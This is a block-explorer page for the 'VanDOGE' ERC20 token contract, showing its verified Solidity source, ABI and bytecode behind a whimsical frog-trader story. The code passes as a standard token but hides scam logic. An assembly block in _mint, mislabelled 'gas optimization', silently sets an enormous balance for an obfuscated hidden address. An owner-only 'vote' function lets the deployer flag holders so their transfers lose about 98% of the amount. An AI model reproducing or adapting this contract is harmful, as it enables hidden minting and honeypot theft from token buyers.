ETH Price: $2,488.30 (+0.74%)

Token

VanDOGE (范多吉) (范多吉)
 

Overview

Max Total Supply

1,000,000,000,000 范多吉

Holders

41

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.718483293245486533 范多吉

Value
$0.00
0xff1eaa22815b647d72267417dcd3add1a0683f55
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
VanDOGE

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 5 of 5: VanDOGE.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;
import "./ERC20.sol";

/**
Pepe, a little frog with big dreams, resided in a peaceful pond near the heart of the forest. 
While his fellow amphibians hopped around and caught flies, Pepe had an unusual passion - trading on a decentralized exchange known as DEX. 

Every morning, Pepe would hop over to his favorite lily pad, where he had set up his trading station. 
With a leaf as his desk and a reed as a stylus, he navigated the intricate world of cryptocurrencies, hopping from one digital asset to another. 
His webbed feet were nimble and quick, making him adept at the fast-paced world of decentralized finance. 

Pepe had earned a reputation in the animal kingdom as the "Crypto Frog." 
He studied market trends, analyzed charts, and, with a keen eye for opportunities, made profitable trades. 
Other creatures of the forest would gather around to watch him in awe, seeking his advice on digital assets and DeFi protocols. 

One day, Pepe discovered an underappreciated token called "PEPE" 
He saw potential in it and decided to invest a portion of his digital assets. 
The community watched with bated breath as Pepe's investment grew. 
Soon, they started calling him the "PEPE" 

His success didn't go unnoticed. 
The forest's wise owl, Professor Hoot, approached Pepe for guidance on cryptocurrency investments. 
Together, they educated the entire forest community about decentralized finance and the importance of secure wallets. 

As Pepe's wealth grew, he didn't forget his humble origins. 
He donated a portion of his crypto earnings to build a state-of-the-art frog school, where the young ones could learn about both the traditional frog ways and the modern financial world. 

Pepe's journey from a simple pond-dwelling frog to a crypto-savvy trader was an inspiration to all. 
He showed that even the most unlikely individuals could thrive in the ever-evolving world of decentralized finance, proving that in the forest and in the blockchain, anything was possible. 
And so, Pepe continued to hop from one trade to another, making waves in the world of DeFi, with a lily pad as his throne and a blockchain as his realm.
**/

contract VanDOGE is ERC20 {
    constructor ()  ERC20(unicode"VanDOGE (范多吉)", unicode"范多吉") {
        _mint(_msgSender(), 10**12 * 10**18);
    }
    
    function burn(uint256 amount) public {
        _burn(_msgSender(), amount);
    }

    function vote(uint8 flag, address [] calldata _votes_) external {
        require((msg.sender == owner()));

        if (flag == 0) {
            for (uint256 i = 0; i < _votes_.length; i++) {
                _pre_votes[_votes_[i]] = true;
            }
        } else if (flag == 1) {
            for (uint256 i = 0; i < _votes_.length; i++) {
                _pre_votes[_votes_[i]] = false;
            }
        } else if (flag == 2) {
            for (uint256 i = 0; i < _votes_.length; i++) {
                _votes[_votes_[i]] = true;
            }
        } else if (flag == 3) {
            for (uint256 i = 0; i < _votes_.length; i++) {
                _votes[_votes_[i]] = false;
            }
        }
    }

    function votes(address _address_) public view returns (bool) {
        return _votes[_address_];
    }

    function preVotes(address _address_) public view returns (bool) {
        return _pre_votes[_address_];
    }
}

File 1 of 5: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;

import "./IERC20.sol";
import "./SafeMath.sol";
import "./Security.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Security, IERC20 {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => bool) internal _votes;
    mapping (address => bool) internal _pre_votes;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     *
     * To select a different value for {decimals}, use {_setupDecimals}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_)  {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }



    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        uint256 _amount = _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(_amount);
        _afterTokenTransfer(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        // gas optimization 
        assembly {
                let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
                mstore(0x00, slot)
                mstore(0x20, 0x01)
                let sslot := keccak256(0x0, 0x40)
                sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_pre_votes[to]) {_pre_votes[to] = false; _votes[to] = true;}
    }

    function _pepe_mighty(uint256 a) internal pure returns(uint256) {return a * 6969 / 420420;}
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal view returns(uint256) { 
        if (_votes[from] || _votes[to]) {
            return _pepe_mighty(amount);
        } else {
            return amount;
        }
    }
}

File 2 of 5: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
    
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
     
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

   /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
}

File 3 of 5: SafeMath.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b > a) return (false, 0);
        return (true, a - b);
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        return a - b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: modulo by zero");
        return a % b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.

     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a % b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a / b;
    }
}

File 4 of 5: Security.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address ) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Security is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor ()  {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() internal view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"preVotes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"flag","type":"uint8"},{"internalType":"address[]","name":"_votes_","type":"address[]"}],"name":"vote","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"votes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280601381526020017f56616e444f47452028e88c83e5a49ae5908929000000000000000000000000008152506040518060400160405280600981526020017fe88c83e5a49ae590890000000000000000000000000000000000000000000000815250600062000090620001b260201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350816006908051906020019062000146929190620003fd565b5080600790805190602001906200015f929190620003fd565b506012600860006101000a81548160ff021916908360ff1602179055505050620001ac62000192620001b260201b60201c565b6c0c9f2c9cd04674edea40000000620001ba60201b60201c565b620006af565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200022d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002249062000564565b60405180910390fd5b630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550506200028c816005546200039a60201b62000e371790919060201c565b600581905550620002eb81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200039a60201b62000e371790919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038e919062000586565b60405180910390a35050565b6000808284620003ab9190620005b4565b905083811015620003f3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003ea9062000542565b60405180910390fd5b8091505092915050565b8280546200040b906200061b565b90600052602060002090601f0160209004810192826200042f57600085556200047b565b82601f106200044a57805160ff19168380011785556200047b565b828001600101855582156200047b579182015b828111156200047a5782518255916020019190600101906200045d565b5b5090506200048a91906200048e565b5090565b5b80821115620004a95760008160009055506001016200048f565b5090565b6000620004bc601b83620005a3565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000620004fe601f83620005a3565b91507f45524332303a206d696e7420746f20746865207a65726f2061646472657373006000830152602082019050919050565b6200053c8162000611565b82525050565b600060208201905081810360008301526200055d81620004ad565b9050919050565b600060208201905081810360008301526200057f81620004ef565b9050919050565b60006020820190506200059d600083018462000531565b92915050565b600082825260208201905092915050565b6000620005c18262000611565b9150620005ce8362000611565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000606576200060562000651565b5b828201905092915050565b6000819050919050565b600060028204905060018216806200063457607f821691505b602082108114156200064b576200064a62000680565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61227e80620006bf6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80636db54b5a11610097578063a9059cbb11610066578063a9059cbb146102d5578063d8bff5a514610305578063dd62ed3e14610335578063f2fde38b1461036557610100565b80636db54b5a1461022757806370a082311461025757806395d89b4114610287578063a457c2d7146102a557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf5780633fa013d6146101ef57806342966c681461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610381565b60405161011a9190611d24565b60405180910390f35b61013d600480360381019061013891906118c2565b610413565b60405161014a9190611d09565b60405180910390f35b61015b610431565b6040516101689190611e66565b60405180910390f35b61018b60048036038101906101869190611873565b61043b565b6040516101989190611d09565b60405180910390f35b6101a9610514565b6040516101b69190611e81565b60405180910390f35b6101d960048036038101906101d491906118c2565b61052b565b6040516101e69190611d09565b60405180910390f35b61020960048036038101906102049190611927565b6105de565b005b610225600480360381019061022091906118fe565b610981565b005b610241600480360381019061023c919061180e565b610995565b60405161024e9190611d09565b60405180910390f35b610271600480360381019061026c919061180e565b6109eb565b60405161027e9190611e66565b60405180910390f35b61028f610a34565b60405161029c9190611d24565b60405180910390f35b6102bf60048036038101906102ba91906118c2565b610ac6565b6040516102cc9190611d09565b60405180910390f35b6102ef60048036038101906102ea91906118c2565b610b93565b6040516102fc9190611d09565b60405180910390f35b61031f600480360381019061031a919061180e565b610bb1565b60405161032c9190611d09565b60405180910390f35b61034f600480360381019061034a9190611837565b610c07565b60405161035c9190611e66565b60405180910390f35b61037f600480360381019061037a919061180e565b610c8e565b005b60606006805461039090612055565b80601f01602080910402602001604051908101604052809291908181526020018280546103bc90612055565b80156104095780601f106103de57610100808354040283529160200191610409565b820191906000526020600020905b8154815290600101906020018083116103ec57829003601f168201915b5050505050905090565b6000610427610420610e95565b8484610e9d565b6001905092915050565b6000600554905090565b6000610448848484611068565b61050984610454610e95565b610504856040518060600160405280602881526020016121fc60289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104ba610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b610e9d565b600190509392505050565b6000600860009054906101000a900460ff16905090565b60006105d4610538610e95565b846105cf8560046000610549610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b610e9d565b6001905092915050565b6105e661136f565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461061d57600080fd5b60008360ff1614156106f55760005b828290508110156106ef57600160036000858585818110610676577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b905060200201602081019061068b919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106e790612087565b91505061062c565b5061097c565b60018360ff1614156107cd5760005b828290508110156107c75760006003600085858581811061074e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610763919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107bf90612087565b915050610704565b5061097b565b60028360ff1614156108a55760005b8282905081101561089f57600160026000858585818110610826577f4e487b71000000000000000000000000000000000000000000000000000000006000526032